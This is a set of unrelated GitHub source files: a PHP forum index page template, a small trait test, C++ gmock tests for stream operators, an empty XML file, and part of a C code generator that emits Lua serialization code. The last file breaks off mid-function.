$result = $db->query('SELECT c.id AS cid, c.cat_name, f.id AS fid, f.forum_name, f.forum_desc, f.redirect_url, f.moderators, f.num_topics, f.num_posts, f.last_post, f.last_post_id, f.last_poster FROM '.$db->prefix.'categories AS c INNER JOIN '.$db->prefix.'forums AS f ON c.id=f.cat_id LEFT JOIN '.$db->prefix.'forum_perms AS fp ON (fp.forum_id=f.id AND fp.group_id='.$pun_user['g_id'].') WHERE fp.read_forum IS NULL OR fp.read_forum=1 ORDER BY c.disp_position, c.id, f.disp_position', true) or error('Unable to fetch category/forum list', __FILE__, __LINE__, $db->error());
$cur_category = 0;
$cat_count = 0;
$forum_count = 0;
while ($cur_forum = $db->fetch_assoc($result))
{
$moderators = '';
if ($cur_forum['cid'] != $cur_category) // A new category since last iteration?
{
if ($cur_category != 0)
echo "\t\t\t".'</tbody>'."\n\t\t\t".'</table>'."\n\t\t".'</div>'."\n\t".'</div>'."\n".'</div>'."\n\n";
++$cat_count;
$forum_count = 0;
?>
<div id="idx<?php echo $cat_count ?>" class="blocktable">
<h2><span><?php echo pun_htmlspecialchars($cur_forum['cat_name']) ?></span></h2>
<div class="box">
<div class="inbox">
<table>
<thead>
<tr>
<th class="tcl" scope="col"><?php echo $lang_common['Forum'] ?></th>
<th class="tc2" scope="col"><?php echo $lang_index['Topics'] ?></th>
<th class="tc3" scope="col"><?php echo $lang_common['Posts'] ?></th>
<th class="tcr" scope="col"><?php echo $lang_common['Last post'] ?></th>
</tr>
</thead>
<tbody>
<?php
$cur_category = $cur_forum['cid'];
}
++$forum_count;
$item_status = ($forum_count % 2 == 0) ? 'roweven' : 'rowodd';
$forum_field_new = '';
$icon_type = 'icon';
// Are there new posts since our last visit?
if (isset($new_topics[$cur_forum['fid']]))
{
$item_status .= ' inew';
$forum_field_new = '<span class="newtext">[ <a href="search.php?action=show_new&fid='.$cur_forum['fid'].'">'.$lang_common['New posts'].'</a> ]</span>';
$icon_type = 'icon icon-new';
}
// Is this a redirect forum?
if ($cur_forum['redirect_url'] != '')
{
$forum_field = '<h3><span class="redirtext">'.$lang_index['Link to'].'</span> <a href="'.pun_htmlspecialchars($cur_forum['redirect_url']).'" title="'.$lang_index['Link to'].' '.pun_htmlspecialchars($cur_forum['redirect_url']).'">'.pun_htmlspecialchars($cur_forum['forum_name']).'</a></h3>';
$num_topics = $num_posts = '-';
$item_status .= ' iredirect';
$icon_type = 'icon';
}
else
{
$forum_field = '<h3><a href="viewforum.php?id='.$cur_forum['fid'].'">'.pun_htmlspecialchars($cur_forum['forum_name']).'</a>'.(!empty($forum_field_new) ? ' '.$forum_field_new : '').'</h3>';
$num_topics = $cur_forum['num_topics'];
$num_posts = $cur_forum['num_posts'];
}
if ($cur_forum['forum_desc'] != '')
$forum_field .= "\n\t\t\t\t\t\t\t\t".'<div class="forumdesc">'.$cur_forum['forum_desc'].'</div>';
// If there is a last_post/last_poster
if ($cur_forum['last_post'] != '')
$last_post = '<a href="viewtopic.php?pid='.$cur_forum['last_post_id'].'#p'.$cur_forum['last_post_id'].'">'.format_time($cur_forum['last_post']).'</a> <span class="byuser">'.$lang_common['by'].' '.pun_htmlspecialchars($cur_forum['last_poster']).'</span>';
else if ($cur_forum['redirect_url'] != '')
$last_post = '- - -';
else
$last_post = $lang_common['Never'];
if ($cur_forum['moderators'] != '')
{
$mods_array = unserialize($cur_forum['moderators']);
$moderators = array();
foreach ($mods_array as $mod_username => $mod_id)
{
if ($pun_user['g_view_users'] == '1')
$moderators[] = '<a href="profile.php?id='.$mod_id.'">'.pun_htmlspecialchars($mod_username).'</a>';
else
$moderators[] = pun_htmlspecialchars($mod_username);
}
$moderators = "\t\t\t\t\t\t\t\t".'<p class="modlist">(<em>'.$lang_common['Moderated by'].'</em> '.implode(', ', $moderators).')</p>'."\n";
}
?>
<tr class="<?php echo $item_status ?>">
<td class="tcl">
<div class="<?php echo $icon_type ?>"><div class="nosize"><?php echo forum_number_format($forum_count) ?></div></div>
<div class="tclcon">
<div>
<?php echo $forum_field."\n".$moderators ?>
</div>
</div>
</td>
<td class="tc2"><?php echo forum_number_format($num_topics) ?></td>
<td class="tc3"><?php echo forum_number_format($num_posts) ?></td>
<td class="tcr"><?php echo $last_post ?></td>
</tr>
<?php
}
// Did we output any categories and forums?
if ($cur_category > 0)
echo "\t\t\t".'</tbody>'."\n\t\t\t".'</table>'."\n\t\t".'</div>'."\n\t".'</div>'."\n".'</div>'."\n\n";
else
echo '<div id="idx0" class="block"><div class="box"><div class="inbox"><p>'.$lang_index['Empty board'].'</p></div></div></div>';
// Collect some statistics from the database
if (file_exists(FORUM_CACHE_DIR.'cache_users_info.php'))
include FORUM_CACHE_DIR.'cache_users_info.php';
if (!defined('PUN_USERS_INFO_LOADED'))
{
if (!defined('FORUM_CACHE_FUNCTIONS_LOADED'))
require PUN_ROOT.'include/cache.php';
generate_users_info_cache();
require FORUM_CACHE_DIR.'cache_users_info.php';
}
$result = $db->query('SELECT SUM(num_topics), SUM(num_posts) FROM '.$db->prefix.'forums') or error('Unable to fetch topic/post count', __FILE__, __LINE__, $db->error());
list($stats['total_topics'], $stats['total_posts']) = array_map('intval', $db->fetch_row($result));
if ($pun_user['g_view_users'] == '1')
$stats['newest_user'] = '<a href="profile.php?id='.$stats['last_user']['id'].'">'.pun_htmlspecialchars($stats['last_user']['username']).'</a>';
else
$stats['newest_user'] = pun_htmlspecialchars($stats['last_user']['username']);
if (!empty($forum_actions))
{
?>
<div class="linksb">
<div class="inbox crumbsplus">
<p class="subscribelink clearb"><?php echo implode(' - ', $forum_actions); ?></p>
</div>
</div>
<?php
}
?>
<div id="brdstats" class="block">
<h2><span><?php echo $lang_index['Board info'] ?></span></h2>
<div class="box">
<div class="inbox">
<dl class="conr">
<dt><strong><?php echo $lang_index['Board stats'] ?></strong></dt>
<dd><span><?php printf($lang_index['No of users'], '<strong>'.forum_number_format($stats['total_users']).'</strong>') ?></span></dd>
<dd><span><?php printf($lang_index['No of topics'], '<strong>'.forum_number_format($stats['total_topics']).'</strong>') ?></span></dd>
<dd><span><?php printf($lang_index['No of posts'], '<strong>'.forum_number_format($stats['total_posts']).'</strong>') ?></span></dd>
</dl>
<dl class="conl">
<dt><strong><?php echo $lang_index['User info'] ?></strong></dt>
<dd><span><?php printf($lang_index['Newest user'], $stats['newest_user']) ?></span></dd>
<?php
if ($pun_config['o_users_online'] == '1')
{
// Fetch users online info and generate strings for output
$num_guests = 0;
$users = array();
$result = $db->query('SELECT user_id, ident FROM '.$db->prefix.'online WHERE idle=0 ORDER BY ident', true) or error('Unable to fetch online list', __FILE__, __LINE__, $db->error());
while ($pun_user_online = $db->fetch_assoc($result))
{
if ($pun_user_online['user_id'] > 1)
{
if ($pun_user['g_view_users'] == '1')
$users[] = "\n\t\t\t\t".'<dd><a href="profile.php?id='.$pun_user_online['user_id'].'">'.pun_htmlspecialchars($pun_user_online['ident']).'</a>';
else
$users[] = "\n\t\t\t\t".'<dd>'.pun_htmlspecialchars($pun_user_online['ident']);
}
else
++$num_guests;
}
$num_users = count($users);
echo "\t\t\t\t".'<dd><span>'.sprintf($lang_index['Users online'], '<strong>'.forum_number_format($num_users).'</strong>').'</span></dd>'."\n\t\t\t\t".'<dd><span>'.sprintf($lang_index['Guests online'], '<strong>'.forum_number_format($num_guests).'</strong>').'</span></dd>'."\n\t\t\t".'</dl>'."\n";
if ($num_users > 0)
echo "\t\t\t".'<dl id="onlinelist" class="clearb">'."\n\t\t\t\t".'<dt><strong>'.$lang_index['Online'].' </strong></dt>'."\t\t\t\t".implode(',</dd> ', $users).'</dd>'."\n\t\t\t".'</dl>'."\n";
else
echo "\t\t\t".'<div class="clearer"></div>'."\n";
}
else
echo "\t\t\t".'</dl>'."\n\t\t\t".'<div class="clearer"></div>'."\n";
?>
</div>
</div>
</div>
<?php
$footer_style = 'index';
require PUN_ROOT.'footer.php';
| {
"pile_set_name": "Github"
} |
trait T[X] {}
fn f[A, B: T[A]](b: B) -> () {}
fn main[C: T[bool]](c: C) -> () {
f(c)
}
| {
"pile_set_name": "Github"
} |
#include <Stream.h>
#include <gmock/gmock.h>
using namespace testing;
using namespace stream;
using namespace stream::op;
// Evaluates Operation inside an immediately-invoked lambda and yields true
// iff it threw (a subclass of) Exception.  A macro so arbitrary expressions
// can be passed as Operation.
#define EXCEPTION_TEST(Operation, Exception) \
    [](){ \
        bool thrown = false; \
        try { Operation; } catch(Exception& e) { thrown = true; } \
        return thrown; \
    }()
// Gmock-style assertion built on EXCEPTION_TEST.
#define EXPECT_EXCEPTION(Operation, Exception) \
    EXPECT_THAT(EXCEPTION_TEST(Operation, Exception), Eq(true));
// first(): yields the first element; throws EmptyStreamException when empty.
TEST(FirstTest, Default) {
    EXPECT_THAT(MakeStream::counter(0) | first(), Eq(0));
}
TEST(FirstTest, EmptyStream) {
    EXPECT_EXCEPTION(MakeStream::empty<int>() | first(), EmptyStreamException);
}
// last(): yields the final element; throws EmptyStreamException when empty.
TEST(LastTest, Default) {
    EXPECT_THAT(MakeStream::range(0, 10) | last(), Eq(9));
}
TEST(LastTest, EmptyStream) {
    EXPECT_EXCEPTION(MakeStream::empty<int>() | last(), EmptyStreamException);
}
// nth(k): yields the k-th (0-based) element; throws when the stream has
// fewer than k+1 elements.
TEST(NthTest, Default) {
    EXPECT_THAT(MakeStream::counter(0) | nth(5), Eq(5));
}
TEST(NthTest, EmptyStream) {
    EXPECT_EXCEPTION(MakeStream::range(0, 3) | nth(5), EmptyStreamException);
    EXPECT_EXCEPTION(MakeStream::empty<int>() | nth(5), EmptyStreamException);
}
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-16"?>
<StatusWindowText xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
</StatusWindowText> | {
"pile_set_name": "Github"
} |
#include <stdio.h>
#include <stdint.h>
#include <assert.h>
#include <string.h>
#include <stdlib.h>
#include <ctype.h>
#include <sys/stat.h>
#include <sys/types.h>
#ifdef WIN32
#define __STDC_FORMAT_MACROS
#include <inttypes.h>
#include <zcm/windows/WinPorting.h>
#include <windows.h>
#else
#include <inttypes.h>
#include <unistd.h>
#include <fcntl.h>
#endif
#include <glib.h>
#include "zcmgen.h"
// lua uses just 2 spaces per indent
#define INDENT(n) (2*(n))

// Output helpers: all of them write printf-style text to a FILE*
// named `f` in the enclosing scope, indented `n` levels.
// emit_start()/emit_continue()/emit_end() build one output line across
// several calls; emit() writes a complete line (with newline) at once.
#define emit_start(n, ...) do { fprintf(f, "%*s", INDENT(n), ""); fprintf(f, __VA_ARGS__); } while (0)
#define emit_continue(...) do { fprintf(f, __VA_ARGS__); } while (0)
#define emit_end(...) do { fprintf(f, __VA_ARGS__); fprintf(f, "\n"); } while (0)
#define emit(n, ...) do { fprintf(f, "%*s", INDENT(n), ""); fprintf(f, __VA_ARGS__); fprintf(f, "\n"); } while (0)

// Shorthand for diagnostics on stderr.
#define err(...) fprintf (stderr, __VA_ARGS__)
static void
mkdir_with_parents (const char *path, mode_t mode)
{
#ifdef WIN32
    /* glib already knows how to build a directory chain on Windows. */
    g_mkdir_with_parents(path, 0755);
#else
    /* Walk the string; each time a '/' is found, mkdir() the prefix
     * preceding it.  Directories that already exist simply make
     * mkdir() fail with EEXIST, which is deliberately ignored. */
    size_t len = strlen(path);
    for (size_t pos = 0; pos < len; pos++) {
        if (path[pos] != '/')
            continue;
        char *prefix = (char *) malloc(pos + 1);
        memcpy(prefix, path, pos);
        prefix[pos] = '\0';
        mkdir(prefix, mode);
        free(prefix);
        pos++; /* character right after a separator cannot start one */
    }
#endif
}
static char *
build_filenamev (char **parts)
{
    /* Join the strings in `parts` with the platform directory
     * separator.  Empty components are skipped entirely (neither text
     * nor separator is emitted for them).  The caller owns — and must
     * free() — the returned buffer. */
    int total_len = 1;  /* room for the terminating NUL */
    for (char **p = parts; *p; p++)
        total_len += strlen (*p) + strlen(G_DIR_SEPARATOR_S);

    /* calloc gives us a zeroed buffer, so strcat can append directly */
    char *result = (char *) calloc(1, total_len);
    for (char **p = parts; *p; p++) {
        if (**p == '\0')
            continue;
        strcat(result, *p);
        if (*(p+1))
            strcat(result, G_DIR_SEPARATOR_S);
    }
    return result;
}
static void
get_all_vals_helper (gpointer key, gpointer value, gpointer user_data)
{
    // GHFunc callback for g_hash_table_foreach(): appends each table
    // value to the GPtrArray passed through user_data (key is unused).
    GPtrArray *vals = (GPtrArray*) user_data;
    g_ptr_array_add(vals, value);
}
static GPtrArray *
_hash_table_get_vals (GHashTable *hash_table)
{
    // Collects (borrowed) pointers to every value in `hash_table` into
    // a newly allocated GPtrArray.  The caller frees the array, not
    // the values it points at.
    GPtrArray *vals = g_ptr_array_sized_new(g_hash_table_size(hash_table));
    g_hash_table_foreach (hash_table, get_all_vals_helper, vals);
    return vals;
}
void setup_lua_options(getopt_t *gopt)
{
    // Register the lua backend's command-line options with the shared
    // option parser.  --lpath selects the destination directory for
    // generated .lua files; the empty default makes paths relative.
    getopt_add_string(gopt, 0, "lpath", "",
            "Lua destination directory");
}
static int
is_same_type (const zcm_typename_t *tn1, const zcm_typename_t *tn2) {
    /* Two types are the same iff their fully-qualified names match. */
    return strcmp (tn1->lctypename, tn2->lctypename) == 0;
}
static const char *
nil_initializer_string(const zcm_typename_t *type)
{
    /* Lua expression used to initialise a freshly constructed member
     * of the given primitive type; members of any other (nested
     * struct) type start out as nil. */
    static const struct { const char *type; const char *init; } defaults[] = {
        { "byte",    "0"     },
        { "boolean", "false" },
        { "int8_t",  "0"     },
        { "int16_t", "0"     },
        { "int32_t", "0"     },
        { "int64_t", "0"     },
        { "float",   "0.0"   },
        { "double",  "0.0"   },
        { "string",  "''"    },
    };
    for (size_t i = 0; i < sizeof defaults / sizeof defaults[0]; i++)
        if (!strcmp(type->lctypename, defaults[i].type))
            return defaults[i].init;
    return "nil";
}
static char
_struct_format (zcm_member_t *lm)
{
    /* Single-character zcm._pack format code for a fixed-width
     * primitive member, or 0 when the member is a string or a nested
     * struct (and therefore cannot be batch-packed). */
    const char *tn = lm->type->lctypename;
    static const struct { const char *type; char code; } codes[] = {
        { "byte",    'B' },
        { "boolean", '?' },
        { "int8_t",  'b' },
        { "int16_t", 'h' },
        { "int32_t", 'i' },
        { "int64_t", 'q' },
        { "float",   'f' },
        { "double",  'd' },
    };
    for (size_t i = 0; i < sizeof codes / sizeof codes[0]; i++)
        if (!strcmp (codes[i].type, tn))
            return codes[i].code;
    return 0;
}
static int
_primitive_type_size (const char *tn)
{
    /* Wire size in bytes of a fixed-width primitive ZCM type.
     * Aborts (assert) on any other name, e.g. "string". */
    static const struct { const char *type; int size; } sizes[] = {
        { "byte",    1 },
        { "boolean", 1 },
        { "int8_t",  1 },
        { "int16_t", 2 },
        { "int32_t", 4 },
        { "int64_t", 8 },
        { "float",   4 },
        { "double",  8 },
    };
    for (size_t i = 0; i < sizeof sizes / sizeof sizes[0]; i++)
        if (!strcmp (sizes[i].type, tn))
            return sizes[i].size;
    assert (0);
    return 0;
}
static char *
escape_typename_to_variablename(const char * tn){
    /* Turn a fully-qualified type name ("pkg.sub.type") into a legal
     * Lua identifier ("pkg_sub_type") by replacing every '.' with '_'.
     * Returns a newly allocated string; callers release it with
     * g_free().
     *
     * Cleanup: the original aliased the fresh copy through a
     * const-qualified pointer and then repeatedly cast the const away
     * again — the copy is ours to mutate, so just keep it mutable. */
    char *varname = g_strdup(tn);
    for (char *p = varname; *p != '\0'; ++p) {
        if (*p == '.')
            *p = '_';
    }
    return varname;
}
static void
_emit_decode_one (const zcmgen_t *zcm, FILE *f, zcm_struct_t *ls,
        zcm_member_t *lm, const char *accessor, int indent)
{
    // Emit Lua code that decodes one scalar value into `accessor`.
    // Strings travel as a 4-byte big-endian length followed by the
    // bytes; primitives use fixed-width big-endian format codes (the
    // same ones _struct_format() produces); anything else is a nested
    // ZCM type decoded through that type's own _decode_one().
    // XXX probably needs some rework
    const char *tn = lm->type->lctypename;
    const char *mn = lm->membername;
    const char *sn = lm->type->shortname;
    if (!strcmp ("string", tn)) {
        emit (indent, "local __%s_tmpstrlen = zcm._pack.unpack('>I', data:read(4))", mn);
        emit (indent, "%s = zcm._pack.prepare_string(data:read(__%s_tmpstrlen))",
                accessor, mn);
    } else if (!strcmp ("byte", tn)) {
        emit (indent, "%s = zcm._pack.unpack('>B', data:read(1))", accessor);
    } else if (!strcmp ("int8_t", tn)) {
        emit (indent, "%s = zcm._pack.unpack('>b', data:read(1))", accessor);
    } else if (!strcmp ("boolean", tn)) {
        emit (indent, "%s = zcm._pack.unpack('>?', data:read(1))", accessor);
    } else if (!strcmp ("int16_t", tn)) {
        emit (indent, "%s = zcm._pack.unpack('>h', data:read(2))", accessor);
    } else if (!strcmp ("int32_t", tn)) {
        emit (indent, "%s = zcm._pack.unpack('>i', data:read(4))", accessor);
    } else if (!strcmp ("int64_t", tn)) {
        emit (indent, "%s = zcm._pack.unpack('>q', data:read(8))", accessor);
    } else if (!strcmp ("float", tn)) {
        emit (indent, "%s = zcm._pack.unpack('>f', data:read(4))", accessor);
    } else if (!strcmp ("double", tn)) {
        emit (indent, "%s = zcm._pack.unpack('>d', data:read(8))", accessor);
    } else {
        // XXX not really sure about these...
        // check if same type
        if (is_same_type(lm->type, ls->structname)) {
            // self-referential member: the type's own table is in scope
            emit (indent, "%s = %s._decode_one(data)", accessor, sn);
        } else {
            // cross-type member: refer to it by the require()'d
            // escaped variable name (see emit_lua_dependencies)
            char *variablename = escape_typename_to_variablename(tn);
            emit (indent, "%s = %s._decode_one(data)", accessor, variablename);
            g_free(variablename);
        }
    }
}
static void
_emit_decode_list(const zcmgen_t *zcm, FILE *f, zcm_struct_t *ls,
        zcm_member_t *lm, const char *accessor, int indent,
        const char *len, int fixed_len)
{
    // Emit Lua code that decodes a whole array of fixed-width
    // primitives with a single zcm._pack.unpack() call.  `len` is a
    // literal element count when fixed_len is non-zero; otherwise it
    // is the name of the struct member that holds the runtime length.
    // Strings and nested types are decoded element-by-element by the
    // caller, never through this path.
    const char *tn = lm->type->lctypename;
    if (!strcmp ("byte", tn) ||
        !strcmp ("int8_t", tn) ||
        !strcmp ("boolean", tn) ||
        !strcmp ("int16_t", tn) ||
        !strcmp ("int32_t", tn) ||
        !strcmp ("int64_t", tn) ||
        !strcmp ("float", tn) ||
        !strcmp ("double", tn)) {
        if(fixed_len) {
            emit (indent, "%s = {zcm._pack.unpack('>%s%c', data:read(%d))}",
                    accessor, len, _struct_format(lm),
                    atoi(len) * _primitive_type_size(tn));
        } else {
            // runtime length: the generated code computes the byte
            // count from the length member at decode time
            if(_primitive_type_size(tn) > 1) {
                emit (indent, "%s = {zcm._pack.unpack(string.format('>%%d%c', obj.%s), data:read(obj.%s * %d))}",
                        accessor, _struct_format(lm), len, len, _primitive_type_size(tn));
            } else {
                emit (indent, "%s = {zcm._pack.unpack(string.format('>%%d%c', obj.%s), data:read(obj.%s))}",
                        accessor, _struct_format(lm), len, len);
            }
        }
    } else {
        // callers must not pass string/struct members here
        assert(0);
    }
}
static void
_flush_read_struct_fmt (const zcmgen_t *zcm, FILE *f,
        GQueue *formats, GQueue *members)
{
    // Emit one combined unpack for the queued run of consecutive
    // primitive scalar members, e.g.
    //   obj.a, obj.b = zcm._pack.unpack('>ih', data:read(6))
    // Both queues are drained; this is a no-op when they are empty.
    int nfmts = g_queue_get_length(formats);
    assert (nfmts == g_queue_get_length (members));
    if(nfmts == 0)
        return;
    emit_start(1, ""); // for indent
    int fmtsize = 0;
    while (! g_queue_is_empty (members)) {
        zcm_member_t *lm = (zcm_member_t*) g_queue_pop_head (members);
        emit_continue ("obj.%s", lm->membername);
        if (! g_queue_is_empty (members)) {
            emit_continue (", ");
        }
        fmtsize += _primitive_type_size (lm->type->lctypename);
    }
    emit_continue (" = zcm._pack.unpack('>");
    while (! g_queue_is_empty (formats)) {
        emit_continue ("%c", GPOINTER_TO_INT (g_queue_pop_head (formats)));
    }
    emit_end ("', data:read(%d))", fmtsize);
}
static void
emit_lua_decode_one (const zcmgen_t *zcm, FILE *f, zcm_struct_t *ls)
{
    // Emit the _decode_one(data) "class function": decodes one struct
    // body (no fingerprint) from `data`, which may be a raw string
    // (wrapped in _buffer_helper) or any object with a :read(n)
    // method.  Runs of consecutive primitive scalar members are
    // batched into a single unpack via _flush_read_struct_fmt().
    emit(0, "function %s._decode_one(data)", ls->structname->shortname);
    emit(0, "");
    emit(0, "    if not data.read then");
    emit(0, "        data = _buffer_helper:new(data)");
    emit(0, "    end");
    emit(0, "");
    emit(0, "    local obj = %s:new()", ls->structname->shortname);
    emit(0, "");
    GQueue *struct_fmt = g_queue_new ();
    GQueue *struct_members = g_queue_new ();
    for (unsigned int m = 0; m < g_ptr_array_size(ls->members); m++) {
        zcm_member_t *lm = (zcm_member_t *) g_ptr_array_index(ls->members, m);
        char fmt = _struct_format (lm);
        if (! lm->dimensions->len) {
            // scalar: primitives queue up for a batched unpack,
            // anything else flushes the queue first
            if (fmt) {
                g_queue_push_tail (struct_fmt, GINT_TO_POINTER ((int)fmt));
                g_queue_push_tail (struct_members, lm);
            } else {
                _flush_read_struct_fmt (zcm, f, struct_fmt, struct_members);
                char *accessor = g_strdup_printf("obj.%s", lm->membername);
                _emit_decode_one (zcm, f, ls, lm, accessor, 1);
                g_free(accessor);
            }
        } else {
            _flush_read_struct_fmt (zcm, f, struct_fmt, struct_members);
            GString *accessor = g_string_new ("");
            g_string_append_printf (accessor, "obj.%s", lm->membername);
            // iterate through the dimensions of the member, building up
            // an accessor string, and emitting for loops
            int n;
            for (n=0; n<lm->dimensions->len - 1; n++) {
                zcm_dimension_t *dim =
                    (zcm_dimension_t *) g_ptr_array_index (lm->dimensions, n);
                emit (1+n, "%s = {}", accessor->str);
                if (dim->mode == ZCM_CONST) {
                    emit (1+n, "for i%d = 1, %s do", n, dim->size);
                } else {
                    // variable dimension: the length lives in another
                    // (already decoded) member named by dim->size
                    emit (1+n, "for i%d = 1, obj.%s do", n, dim->size);
                }
                g_string_append_printf(accessor, "[i%d]", n);
            }
            // last dimension.
            zcm_dimension_t *last_dim = (zcm_dimension_t *) g_ptr_array_index(lm->dimensions,
                    lm->dimensions->len - 1);
            int last_dim_fixed_len = last_dim->mode == ZCM_CONST;
            if(zcm_is_primitive_type(lm->type->lctypename) &&
               0 != strcmp(lm->type->lctypename, "string")) {
                // member is a primitive non-string type. Emit code to
                // decode a full array in one call to struct.unpack
                _emit_decode_list(zcm, f, ls, lm,
                        accessor->str, 1+n, last_dim->size, last_dim_fixed_len);
            } else {
                // member is either a string type or an inner ZCM type. Each
                // array element must be decoded individually
                emit (1+n, "%s = {}", accessor->str);
                if (last_dim_fixed_len) {
                    emit (1+n, "for i%d = 1, %s do", n, last_dim->size);
                } else {
                    emit (1+n, "for i%d = 1, obj.%s do", n, last_dim->size);
                }
                g_string_append_printf (accessor, "[i%d]", n);
                _emit_decode_one (zcm, f, ls, lm, accessor->str, n+2);
                emit (1+n, "end");
            }
            g_string_free (accessor, TRUE);
            // close out the nested for-loops opened above
            while ( --n >= 0 ) {
                emit (1+n, "end");
            }
        }
    }
    _flush_read_struct_fmt (zcm, f, struct_fmt, struct_members);
    g_queue_free (struct_fmt);
    g_queue_free (struct_members);
    emit(0, "");
    emit(0, "    return obj");
    emit(0, "end");
    emit(0, "");
}
static void
emit_lua_decode (const zcmgen_t *zcm, FILE *f, zcm_struct_t *ls)
{
    // Emit the public .decode(data) function: verifies the leading
    // 8-byte packed fingerprint, then hands the remaining bytes to
    // _decode_one().
    const char *sn = ls->structname->shortname;
    emit(0, "function %s.decode(data)", sn);
    emit(0, "");
    emit(0, "    if data:sub(1, 8) ~= %s._packed_fingerprint then", sn);
    emit(0, "        error('bad fingerprint')");
    emit(0, "    end");
    emit(0, "");
    emit(0, "    return %s._decode_one(data:sub(9))", sn);
    emit(0, "end");
    emit(0, "");
}
static void
_emit_encode_one (const zcmgen_t *zcm, FILE *f, zcm_struct_t *ls,
        zcm_member_t *lm, const char *accessor, int indent)
{
    /* Emit Lua code that encodes one scalar value (referenced by
     * `accessor`) by appending packed bytes to the generated
     * function's buf_table.  Strings are written as a 4-byte
     * big-endian length (counting the trailing NUL) followed by the
     * NUL-terminated bytes; primitives use the same big-endian format
     * codes the decoder reads; anything else is a nested ZCM type
     * serialized through its own :_encode_one(). */
    const char *tn = lm->type->lctypename;
    const char *mn = lm->membername;
    if (!strcmp ("string", tn)) {
        emit (indent, "local __%s_tmpstr = zcm._pack.prepare_string(%s)", mn, accessor);
        emit (indent, "table.insert(buf_table, zcm._pack.pack('>I', #__%s_tmpstr + 1))", mn);
        emit (indent, "table.insert(buf_table, __%s_tmpstr .. '\\0')", mn);
    } else if (!strcmp ("byte", tn)) {
        emit (indent, "table.insert(buf_table, zcm._pack.pack('>B', %s))", accessor);
    } else if (!strcmp ("int8_t", tn)) {
        emit (indent, "table.insert(buf_table, zcm._pack.pack('>b', %s))", accessor);
    } else if (!strcmp ("boolean", tn)) {
        emit (indent, "table.insert(buf_table, zcm._pack.pack('>?', %s))", accessor);
    } else if (!strcmp ("int16_t", tn)) {
        emit (indent, "table.insert(buf_table, zcm._pack.pack('>h', %s))", accessor);
    } else if (!strcmp ("int32_t", tn)) {
        /* FIX: this branch used to emit '>l', which does not match the
         * '>i' (4-byte) code used by _emit_decode_one() and
         * _struct_format() for int32_t.  Use '>i' so encoder and
         * decoder agree on the wire format. */
        emit (indent, "table.insert(buf_table, zcm._pack.pack('>i', %s))", accessor);
    } else if (!strcmp ("int64_t", tn)) {
        emit (indent, "table.insert(buf_table, zcm._pack.pack('>q', %s))", accessor);
    } else if (!strcmp ("float", tn)) {
        emit (indent, "table.insert(buf_table, zcm._pack.pack('>f', %s))", accessor);
    } else if (!strcmp ("double", tn)) {
        emit (indent, "table.insert(buf_table, zcm._pack.pack('>d', %s))", accessor);
    } else {
        /* nested ZCM type: delegate to its own encoder */
        emit (indent, "table.insert(buf_table, %s:_encode_one())", accessor);
    }
}
static void
_emit_encode_list(const zcmgen_t *zcm, FILE *f, zcm_struct_t *ls,
        zcm_member_t *lm, const char *accessor, int indent,
        const char *len, int fixed_len)
{
    // Emit Lua code that packs an entire primitive array with a single
    // zcm._pack.pack() call, splatting the table via Lua's unpack().
    // `len` is a literal element count when fixed_len is non-zero;
    // otherwise it names the member holding the runtime length.
    const char *tn = lm->type->lctypename;
    if (!strcmp ("byte", tn) ||
        !strcmp ("boolean", tn) ||
        !strcmp ("int8_t", tn) ||
        !strcmp ("int16_t", tn) ||
        !strcmp ("int32_t", tn) ||
        !strcmp ("int64_t", tn) ||
        !strcmp ("float", tn) ||
        !strcmp ("double", tn)) {
        if(fixed_len) {
            emit(indent, "table.insert(buf_table, zcm._pack.pack('>%s%c', unpack(%s)))",
                    len, _struct_format(lm), accessor);
        } else {
            // format string is built at runtime from the length member
            emit(indent, "table.insert(buf_table, zcm._pack.pack(string.format('>%%d%c', self.%s), unpack(%s)))",
                    _struct_format(lm), len, accessor);
        }
    } else {
        // strings and nested types never take this path
        assert(0);
    }
}
static void
_flush_write_struct_fmt (FILE *f, GQueue *formats, GQueue *members)
{
    // XXX encode primitive members in one line
    // Emits a single pack() covering the queued run of consecutive
    // primitive scalar members, e.g.
    //   table.insert(buf_table, zcm._pack.pack('>ih', self.a, self.b))
    // Drains both queues; a no-op when they are empty.
    assert (g_queue_get_length (formats) == g_queue_get_length (members));
    if (g_queue_is_empty (formats)) return;
    emit_start (1, "table.insert(buf_table, zcm._pack.pack('>");
    while (! g_queue_is_empty (formats)) {
        emit_continue ("%c", GPOINTER_TO_INT (g_queue_pop_head (formats)));
    }
    emit_continue ("', ");
    while (! g_queue_is_empty (members)) {
        zcm_member_t *lm = (zcm_member_t*) g_queue_pop_head (members);
        emit_continue ("self.%s", lm->membername);
        if (! g_queue_is_empty (members)) {
            emit_continue (", ");
        }
    }
    emit_end ("))");
}
static void
emit_lua_encode_one (const zcmgen_t *zcm, FILE *f, zcm_struct_t *ls)
{
    /* Emit the :_encode_one() method: packs the struct body (no
     * fingerprint) and returns it as a Lua string.  Runs of
     * consecutive primitive scalar members are batched into a single
     * pack() call by _flush_write_struct_fmt(). */
    emit(0, "function %s:_encode_one()", ls->structname->shortname);
    // check for no members
    if(!g_ptr_array_size(ls->members)){
        emit(0, "");
        emit(0, "    -- nothing to do");
        /* FIX: this branch used to emit no return statement, so
         * _encode_one() returned nil and the generated :encode()
         * crashed concatenating fingerprint .. nil.  An empty struct
         * must encode to the empty string. */
        emit(0, "    return ''");
        emit(0, "end");
        return;
    }
    emit(0, "");
    emit(0, "    local buf_table = {}");
    emit(0, "");
    GQueue *struct_fmt = g_queue_new ();
    GQueue *struct_members = g_queue_new ();
    for (unsigned int m = 0; m < g_ptr_array_size(ls->members); m++) {
        zcm_member_t *lm = (zcm_member_t *) g_ptr_array_index(ls->members, m);
        char fmt = _struct_format (lm);
        if (! lm->dimensions->len) {
            // scalar member
            if (fmt) {
                // primitive: queue it for a batched pack
                g_queue_push_tail (struct_fmt, GINT_TO_POINTER ((int)fmt));
                g_queue_push_tail (struct_members, lm);
            } else {
                // string/nested type: flush the queue, then emit singly
                _flush_write_struct_fmt (f, struct_fmt, struct_members);
                char *accessor = g_strdup_printf("self.%s", lm->membername);
                _emit_encode_one (zcm, f, ls, lm, accessor, 1);
                g_free(accessor);
            }
        } else {
            // array member: emit nested for-loops over the leading
            // dimensions, building up the accessor as we go
            _flush_write_struct_fmt (f, struct_fmt, struct_members);
            GString *accessor = g_string_new ("");
            g_string_append_printf (accessor, "self.%s", lm->membername);
            int n;
            for (n=0; n<lm->dimensions->len - 1; n++) {
